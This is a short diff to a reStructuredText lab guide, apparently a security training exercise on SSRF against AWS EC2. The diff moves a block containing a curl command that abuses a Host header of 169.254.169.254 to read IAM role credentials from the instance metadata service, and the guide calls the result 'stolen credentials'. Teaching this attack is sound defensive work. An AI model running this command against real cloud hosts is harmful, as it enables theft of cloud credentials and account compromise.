bmp-dot/test/index.rst

 ++++++++++++++++++

 -  Replace ``<ec2-ip-address>`` and ``<ec2-role-name>`` from the
-   previous steps to get the keys.
+   previous steps to get the keys

+.. code:: bash

+   curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/<ec2-role-name> -H 'Host:169.254.169.254'

 .. note::  **Copy response to text file**.
 You will use the stolen credentials

-.. code:: bash

-   curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/<ec2-role-name> -H 'Host:169.254.169.254'

 .. figure:: ./images/ssrf2.png
    :alt: creds